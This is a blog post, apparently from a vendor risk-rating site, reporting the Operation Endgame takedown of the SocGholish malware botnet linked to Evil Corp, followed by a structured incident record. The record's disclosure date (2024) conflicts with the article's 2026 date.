• Home
  • cyber
  • Evil Corp: Operation Endgame Disrupts Malware Linked to Major Ransomware Gang
cyber Cyber Attack

Evil Corp: Operation Endgame Disrupts Malware Linked to Major Ransomware Gang

Jun 18, 2026 2 min read
Evil Corp: Operation Endgame Disrupts Malware Linked to Major Ransomware Gang

Global Law Enforcement Disrupts SocGholish Malware Network in Major Cybercrime Takedown

An international law enforcement operation has dismantled a vast cybercriminal network linked to the SocGholish malware, disrupting a botnet used to distribute ransomware and other malicious payloads. The takedown, announced by Dutch police on June 18, was part of Operation Endgame, a global initiative targeting ransomware and cybercrime.

The SocGholish group, tracked by cybersecurity firm Proofpoint as TA569, compromised 15,000 legitimate WordPress websites by exploiting leaked credentials or hacking into them. These sites were then used to serve malicious pop-ups, tricking visitors into downloading fake software updates that infected their systems. Once compromised, devices were ensnared into the SocGholish botnet, which was frequently leveraged by Evil Corp, a Russia-linked cybercrime syndicate responsible for high-profile attacks on governments, healthcare institutions, and enterprises.

The operation, conducted over a week, resulted in the seizure of 106 servers and domains tied to the malware and the remediation of infected websites. Authorities from the Netherlands (NHCTU), Canada (RCMP), Germany (BKA), and the U.S. (FBI) collaborated on the effort, with support from Europol, Eurojust, and private cybersecurity partners like Infoblox.

Maikel Rollman of the Dutch NHCTU stated that the action cut off cybercriminals’ access to infected systems, reducing the risk of further attacks on critical infrastructure. Dr. Renée Burton of Infoblox emphasized the threat’s broad reach, noting that SocGholish’s activities enabled other criminals to infiltrate networks.

Website owners were notified of the breaches and advised to update credentials and apply security patches to prevent reinfection. The operation marks the first phase of continued efforts to dismantle SocGholish’s infrastructure.

Source: https://www.infosecurity-magazine.com/news/operation-endgame-socgholish-evil/

Evil Corp TPRM report: https://www.rankiteo.com/company/evil-corp

"id": "evi1781864638",
"linkid": "evil-corp",
"type": "Cyber Attack",
"date": "6/2026",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"
{'affected_entities': [{'industry': 'various',
                        'location': 'global',
                        'name': 'WordPress website owners',
                        'type': 'websites'},
                       {'industry': 'public sector',
                        'location': 'global',
                        'name': 'Governments',
                        'type': 'organization'},
                       {'industry': 'healthcare',
                        'location': 'global',
                        'name': 'Healthcare institutions',
                        'type': 'organization'},
                       {'industry': 'various',
                        'location': 'global',
                        'name': 'Enterprises',
                        'type': 'organization'}],
 'attack_vector': 'malicious pop-ups (fake software updates)',
 'date_publicly_disclosed': '2024-06-18',
 'description': 'An international law enforcement operation has dismantled a '
                'vast cybercriminal network linked to the SocGholish malware, '
                'disrupting a botnet used to distribute ransomware and other '
                'malicious payloads. The takedown was part of Operation '
                'Endgame, a global initiative targeting ransomware and '
                'cybercrime.',
 'impact': {'operational_impact': 'disruption of cybercriminal network access '
                                  'to infected systems',
            'systems_affected': '15,000 legitimate WordPress websites'},
 'initial_access_broker': {'entry_point': 'compromised WordPress websites'},
 'investigation_status': 'ongoing (first phase completed)',
 'motivation': ['cybercrime', 'financial gain'],
 'post_incident_analysis': {'corrective_actions': 'seizure of infrastructure, '
                                                  'remediation of infected '
                                                  'sites, security advisories',
                            'root_causes': 'exploitation of leaked credentials '
                                           'or hacked WordPress websites'},
 'recommendations': 'Update credentials and apply security patches to prevent '
                    'reinfection',
 'references': [{'source': 'Dutch police (NHCTU)'},
                {'source': 'Proofpoint (TA569)'},
                {'source': 'Infoblox'}],
 'response': {'containment_measures': 'seizure of 106 servers and domains, '
                                      'remediation of infected websites',
              'law_enforcement_notified': True,
              'remediation_measures': 'website owners notified to update '
                                      'credentials and apply security patches',
              'third_party_assistance': ['Infoblox', 'Europol', 'Eurojust']},
 'stakeholder_advisories': 'Website owners notified of breaches and advised on '
                           'security measures',
 'threat_actor': ['SocGholish group (TA569)', 'Evil Corp'],
 'title': 'Global Law Enforcement Disrupts SocGholish Malware Network in Major '
          'Cybercrime Takedown',
 'type': ['malware', 'botnet'],
 'vulnerability_exploited': 'leaked credentials or hacked WordPress websites'}
Published by
Jeremy C
Jeremy C
You might also like
Great! Next, complete checkout for full access to Rankiteo Blog.
Welcome back! You've successfully signed in.
You've successfully subscribed to Rankiteo Blog.
Success! Your account is fully activated, you now have access to all content.
Success! Your billing info has been updated.
Your billing was not updated.